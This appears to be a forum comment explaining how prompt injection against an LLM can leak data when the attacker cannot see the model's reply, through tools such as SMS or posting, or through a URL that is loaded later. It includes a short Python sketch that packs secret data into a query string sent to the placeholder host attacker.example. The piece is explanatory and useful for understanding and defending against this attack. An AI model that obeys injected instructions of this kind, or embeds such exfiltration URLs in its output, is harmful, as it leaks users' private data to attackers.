by charcircuit 151 days ago
This applies when input from the attacker is fed to an LLM, but the response from that LLM is not returned to the attacker.

If an attacker tries a prompt injection, they are unable to see the LLM's response. To complete the attack they need to find an alternate way to have information sent back to them. For example, if the LLM had access to a tool to send an SMS message, the prompt injection could tell it to message the attacker, or maybe it has a tool to post on X, which the attacker could then see. In this blog post, the way information gets back to the attacker is by having someone load a URL by viewing the OpenAI log viewer.
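
To make the URL channel concrete, here is a minimal Python sketch of how a single URL load can carry data back to an attacker. It is not the exact payload from the blog post: the endpoint `attacker.example`, the query parameter `d`, and both function names are hypothetical, made up for illustration. The idea is only that whatever the injected prompt gets the LLM to put in the URL ends up in the attacker's server logs once anyone (or any viewer) fetches it.

```python
from urllib.parse import urlencode, urlparse, parse_qs

# Hypothetical attacker-controlled endpoint (an assumption, not from the post).
ATTACKER_ENDPOINT = "https://attacker.example/collect"


def build_exfil_url(secret: str) -> str:
    """Pack data into a query string, as an injected prompt might ask the LLM to do."""
    return f"{ATTACKER_ENDPOINT}?{urlencode({'d': secret})}"


def recover_from_request(url: str) -> str:
    """What the attacker's server can read back from the requested URL."""
    return parse_qs(urlparse(url).query)["d"][0]


# The LLM output contains this URL; the attacker never sees the output itself.
url = build_exfil_url("user email: alice@example.com")

# Later, someone viewing the output causes the URL to be loaded,
# and the attacker reads the data from the incoming request.
recovered = recover_from_request(url)
```

The attacker never needs the LLM's response directly; they only need something on the victim's side to make the request.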